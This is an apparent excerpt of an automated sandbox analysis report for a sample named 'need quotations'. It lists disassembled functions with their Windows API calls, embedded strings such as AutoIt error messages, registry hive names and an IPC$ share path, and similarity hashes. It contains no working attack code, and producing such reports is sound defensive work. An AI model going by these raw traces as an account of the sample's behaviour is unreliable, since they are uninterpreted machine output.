___wtomb_environ.LIBCMT ref: 0027884F

Part of subcall function 00267C0E: __getptd_noexit.LIBCMT ref: 00267C0E

__malloc_crt.LIBCMT ref: 00278875
__malloc_crt.LIBCMT ref: 00278892
_free.LIBCMT ref: 002788C9
__recalloc_crt.LIBCMT ref: 00278902
__recalloc_crt.LIBCMT ref: 00278947
_strlen.LIBCMT ref: 00278973
__calloc_crt.LIBCMT ref: 0027897D
_strlen.LIBCMT ref: 0027898C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 002789BA
_free.LIBCMT ref: 002789D4
_free.LIBCMT ref: 002789E1
_free.LIBCMT ref: 002789F3
__invoke_watson.LIBCMT ref: 00278A0D

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 5836fb4526ac681a2ee3cdc0742e80dc07b491594f099f78f74fb7529c602ccf
Instruction ID: dd5cbe002e982d493870050dd338252a24d028cc91371026f3b8e2730b6ff2bb
Opcode Fuzzy Hash: 5836fb4526ac681a2ee3cdc0742e80dc07b491594f099f78f74fb7529c602ccf
Instruction Fuzzy Hash: DE6107329A1216EFDB255F64DC49B7977A8EF00720F248126E809EB2C1DF74D970CB96

Function 002AE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 002AE754
GetFileSize.KERNEL32(00000000,00000000), ref: 002AE76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 002AE776
CloseHandle.KERNEL32(00000000), ref: 002AE783
GlobalLock.KERNEL32(00000000), ref: 002AE78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002AE79B
GlobalUnlock.KERNEL32(00000000), ref: 002AE7A4
CloseHandle.KERNEL32(00000000), ref: 002AE7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 002AE7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,002CD9BC,?), ref: 002AE7D5
GlobalFree.KERNEL32(00000000), ref: 002AE7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 002AE809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 002AE834
DeleteObject.GDI32(00000000), ref: 002AE85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002AE872

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 81aaa8f26ff4723d82231feb36dbb6c3e1aeed77849d808ce140dfac5691efe5
Instruction ID: d139fb53de729c67546d7eb56d8edcd5a77898760480aeda373c20803075f421
Opcode Fuzzy Hash: 81aaa8f26ff4723d82231feb36dbb6c3e1aeed77849d808ce140dfac5691efe5
Instruction Fuzzy Hash: 8D414A75600205FFDB119F65EC4CEAABBB8EF8A711F104068F909D7260CB70AD41DB60

Function 002905F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0029076F
_wcscat.LIBCMT ref: 00290787
_wcscat.LIBCMT ref: 00290799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002907AE
SetCurrentDirectoryW.KERNEL32(?), ref: 002907C2
GetFileAttributesW.KERNEL32(?), ref: 002907DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 002907F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00290806

Strings

*.*, xrefs: 00290845

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: ad5a09e07960d2637d7a8e72da58579ebac85e9b0bcccf71e0c871e19615282a
Instruction ID: 948107532c3ac0bcc4945f7e28240e572c60d75f6e1e813a0d03f651c5669c5d
Opcode Fuzzy Hash: ad5a09e07960d2637d7a8e72da58579ebac85e9b0bcccf71e0c871e19615282a
Instruction Fuzzy Hash: 4D81A17162430A9FCF24DF24C88496EB7E8BF89304F14482EF985C7251E770D9648F52

Function 002AEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002AEF3B
GetFocus.USER32 ref: 002AEF4B
GetDlgCtrlID.USER32(00000000), ref: 002AEF56
_memset.LIBCMT ref: 002AF081
GetMenuItemInfoW.USER32 ref: 002AF0AC
GetMenuItemCount.USER32(00000000), ref: 002AF0CC
GetMenuItemID.USER32(?,00000000), ref: 002AF0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 002AF113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 002AF15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002AF193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002AF1C8

Strings

0, xrefs: 002AF079

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: b245422e960849e5d4ad38cf2b448dc53724b70c01d783f52672f4a9c40f2731
Instruction ID: 7fc2c24f44f0bc5083f8296ae624ca6421367b339d9e4cf50c398518e5e33a98
Opcode Fuzzy Hash: b245422e960849e5d4ad38cf2b448dc53724b70c01d783f52672f4a9c40f2731
Instruction Fuzzy Hash: 7B819C70124302AFDB20CF54D984E6BBBE8FB89314F00452EF99897291DB74D825CFA2

Function 0027A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0027ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0027ABD7
Part of subcall function 0027ABBB: GetLastError.KERNEL32(?,0027A69F,?,?,?), ref: 0027ABE1
Part of subcall function 0027ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0027A69F,?,?,?), ref: 0027ABF0
Part of subcall function 0027ABBB: HeapAlloc.KERNEL32(00000000,?,0027A69F,?,?,?), ref: 0027ABF7
Part of subcall function 0027ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0027AC0E

Part of subcall function 0027AC56: GetProcessHeap.KERNEL32(00000008,0027A6B5,00000000,00000000,?,0027A6B5,?), ref: 0027AC62
Part of subcall function 0027AC56: HeapAlloc.KERNEL32(00000000,?,0027A6B5,?), ref: 0027AC69
Part of subcall function 0027AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0027A6B5,?), ref: 0027AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0027A8CB
_memset.LIBCMT ref: 0027A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0027A8FF
GetLengthSid.ADVAPI32(?), ref: 0027A910
GetAce.ADVAPI32(?,00000000,?), ref: 0027A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0027A969
GetLengthSid.ADVAPI32(?), ref: 0027A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0027A995
HeapAlloc.KERNEL32(00000000), ref: 0027A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0027A9BD
CopySid.ADVAPI32(00000000), ref: 0027A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0027A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0027AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0027AA2F

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: c7b8e90f455812436ee22472f89eef8d4ac2507df1e2ed6465bb1083a5eab25f
Instruction ID: f57c906b9853bbdd924272860908309a32cc94afbefa8b8c600e8a9f41fbbdd0
Opcode Fuzzy Hash: c7b8e90f455812436ee22472f89eef8d4ac2507df1e2ed6465bb1083a5eab25f
Instruction Fuzzy Hash: DE515B7191020AAFDF10DF94DD89EEEBBB9FF44310F048129F919A7290DB349A25CB61

Function 00299DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00299E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00299E42
CreateCompatibleDC.GDI32(?), ref: 00299E4E
SelectObject.GDI32(00000000,?), ref: 00299E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00299EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00299EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00299F0F
SelectObject.GDI32(00000006,?), ref: 00299F17
DeleteObject.GDI32(?), ref: 00299F20
DeleteDC.GDI32(00000006), ref: 00299F27
ReleaseDC.USER32(00000000,?), ref: 00299F32

Strings

(, xrefs: 00299ED7

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: bed9ec616a43ba1fabea4b423dd0f0da1453b3e403aa7c49ace1bef44632cb35
Instruction ID: 15b6477e6a354e0f8ac9194e9a135283fe42ab5e29b126284c17ad9de9487251
Opcode Fuzzy Hash: bed9ec616a43ba1fabea4b423dd0f0da1453b3e403aa7c49ace1bef44632cb35
Instruction Fuzzy Hash: D9513B75910309AFCB14CFA8DC89EAEBBB9FF48310F14842DF999A7210D771A941CB90

Function 0028CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0028CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0028CCC5
__swprintf.LIBCMT ref: 0028CD1E
__swprintf.LIBCMT ref: 0028CD37
_wprintf.LIBCMT ref: 0028CDED
_wprintf.LIBCMT ref: 0028CE0B

Strings

Line %d (File "%s"):, xrefs: 0028CD18, 0028CD31
Error: , xrefs: 0028CDB5
^ ERROR, xrefs: 0028CD8F
"%s" (%d) : ==> %s:, xrefs: 0028CE06
"%s" (%d) : ==> %s:%s%s, xrefs: 0028CDE8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: e721aba41bc86514e5f8d047b85f7e6c080714de6b2c6944352d6e2203f00499
Instruction ID: 8c3275cf0c010537fce23399653cdc1d487a2a8edf0f5ef26d974f50bc4c83bf
Opcode Fuzzy Hash: e721aba41bc86514e5f8d047b85f7e6c080714de6b2c6944352d6e2203f00499
Instruction Fuzzy Hash: 75518D31821119BACB19FBA0CD86EEEB778AF05344F204066F505721A2EB716E79DF60

Function 0028CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0028CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0028CAB0
__swprintf.LIBCMT ref: 0028CB09
__swprintf.LIBCMT ref: 0028CB22
_wprintf.LIBCMT ref: 0028CBCD
_wprintf.LIBCMT ref: 0028CBEB

Strings

Line %d (File "%s"):, xrefs: 0028CB03, 0028CB1C
^ ERROR , xrefs: 0028CB64
Error: , xrefs: 0028CB95
"%s" (%d) : ==> %s:, xrefs: 0028CBE6
"%s" (%d) : ==> %s:%s%s, xrefs: 0028CBC8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 401b3b47947aa7909f327959394e7c99ab2c3e98bf1daba3e020fc85f51731a9
Instruction ID: 52553fa3d7120b862738a9c97949cb933c4918b359450c11fc3fd9057eb54ed3
Opcode Fuzzy Hash: 401b3b47947aa7909f327959394e7c99ab2c3e98bf1daba3e020fc85f51731a9
Instruction Fuzzy Hash: EE519E31921519AACF19FBA0CD42EEEB778AF04344F204066F509720A2EB746F79DF61

Function 002A3C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

Strings

HKEY_CURRENT_CONFIG, xrefs: 002A3CC0
HKCC, xrefs: 002A3CD1
HKU, xrefs: 002A3D15
HKCR, xrefs: 002A3CAB
HKEY_CLASSES_ROOT, xrefs: 002A3C96
HKLM, xrefs: 002A3C81
HKCU, xrefs: 002A3CF3
HKEY_CURRENT_USER, xrefs: 002A3CE2
$E/, xrefs: 002A3C36
HKEY_USERS, xrefs: 002A3D04
HKEY_LOCAL_MACHINE, xrefs: 002A3C6C

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: BuffCharUpper
String ID: $E/$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-3778106644
Opcode ID: 44ba0da20a883d23d31002cb6b5e4d65ff3d71751dccc15999faedc9b9ad801b
Instruction ID: 29baedf72e936ad4d56734947cb9adc7e45c0f111984e5fe97d0e2e2ba4bad73
Opcode Fuzzy Hash: 44ba0da20a883d23d31002cb6b5e4d65ff3d71751dccc15999faedc9b9ad801b
Instruction Fuzzy Hash: EA41183113024A8BCF08FF14D851AEB7365AF22741F514866FC955B292EBB0EA7ACB50

Function 002855BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002855D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00285664
GetMenuItemCount.USER32(00301708), ref: 002856ED
DeleteMenu.USER32(00301708,00000005,00000000,000000F5,?,?), ref: 0028577D
DeleteMenu.USER32(00301708,00000004,00000000), ref: 00285785
DeleteMenu.USER32(00301708,00000006,00000000), ref: 0028578D
DeleteMenu.USER32(00301708,00000003,00000000), ref: 00285795
GetMenuItemCount.USER32(00301708), ref: 0028579D
SetMenuItemInfoW.USER32(00301708,00000004,00000000,00000030), ref: 002857D3
GetCursorPos.USER32(?), ref: 002857DD
SetForegroundWindow.USER32(00000000), ref: 002857E6
TrackPopupMenuEx.USER32(00301708,00000000,?,00000000,00000000,00000000), ref: 002857F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00285805

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 86a3ca053df60870016bb88dce6e913a8ef83a73a594eed3e231db0b13345341
Instruction ID: f43faf51aee6d06d546722f12cfc675a246af8a414bf327166b3c99243970cfe
Opcode Fuzzy Hash: 86a3ca053df60870016bb88dce6e913a8ef83a73a594eed3e231db0b13345341
Instruction Fuzzy Hash: 14712778662A26BFEB21AF14DC49FAABF69FF00364F644216F5186A1D0D7B05C70CB50

Function 0027A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0027A1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0027A211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0027A22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0027A249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0027A273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0027A29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0027A2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0027A2AB

Strings

SOFTWARE\Classes\, xrefs: 0027A17D
\CLSID, xrefs: 0027A193
\IPC$, xrefs: 0027A1F3

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 1007e0787dde3a1277debfdbd61777fc905617a230836d1e80948bc05738079b
Instruction ID: 561bef494ac56f57730c395ff3ef9f3b935ba5c27782bb9d569d17fc5b2d0045
Opcode Fuzzy Hash: 1007e0787dde3a1277debfdbd61777fc905617a230836d1e80948bc05738079b
Instruction Fuzzy Hash: BC41E676C20229ABDB15EFA4DC85DEEB7B8FF04750F004169E906A3161EB709E29CF50

Function 002867E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 002867FD
__swprintf.LIBCMT ref: 0028680A

Part of subcall function 0026172B: __woutput_l.LIBCMT ref: 00261784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00286834
LoadResource.KERNEL32(?,00000000), ref: 00286840
LockResource.KERNEL32(00000000), ref: 0028684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0028686D
LoadResource.KERNEL32(?,00000000), ref: 0028687F
SizeofResource.KERNEL32(?,00000000), ref: 0028688E
LockResource.KERNEL32(?), ref: 0028689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002868F9

Strings

5/, xrefs: 002867F6

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5/
API String ID: 1433390588-3989924723
Opcode ID: 6ae64cb893f35cdad42349f565c7b62245902e40faafe160a542131a21bfca4e
Instruction ID: 17b4e3e26eef0811fa63b012b428fb1e73a5bc2d596c45b98973fe9e766750bb
Opcode Fuzzy Hash: 6ae64cb893f35cdad42349f565c7b62245902e40faafe160a542131a21bfca4e
Instruction Fuzzy Hash: 2531B27591221AABDB11AFA0EC5CEBFBBACEF08340F008425F905D2191E730D965DB61

Function 002825B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,002B36F4,00000010,?,Bad directive syntax error,002DDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002825D6
LoadStringW.USER32(00000000,?,002B36F4,00000010), ref: 002825DD
_wprintf.LIBCMT ref: 00282610
__swprintf.LIBCMT ref: 00282632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002826A1

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 0028260B
Line %d (File "%s"):, xrefs: 00282647
Line %d:, xrefs: 0028262C
Error: , xrefs: 0028266F
., xrefs: 00282687

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 2b8b1ec71b638a6248071ff67739fef4bc74892c7814260699d86a3aa6476b7c
Instruction ID: f9b526bb85f37bec32bfb766064a6f103fc086ffcb81853b1cf94c457baddba9
Opcode Fuzzy Hash: 2b8b1ec71b638a6248071ff67739fef4bc74892c7814260699d86a3aa6476b7c
Instruction Fuzzy Hash: 8921303192022EABCF15FB90DC4AEEE7739BF19344F044465F505660A2EB71AA78DF50

Function 00287AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00287B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00287B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00287B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00287B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00287B8C

Strings

alias PlayMe, xrefs: 00287B1B
status PlayMe mode, xrefs: 00287B3D
close PlayMe, xrefs: 00287B53, 00287B80
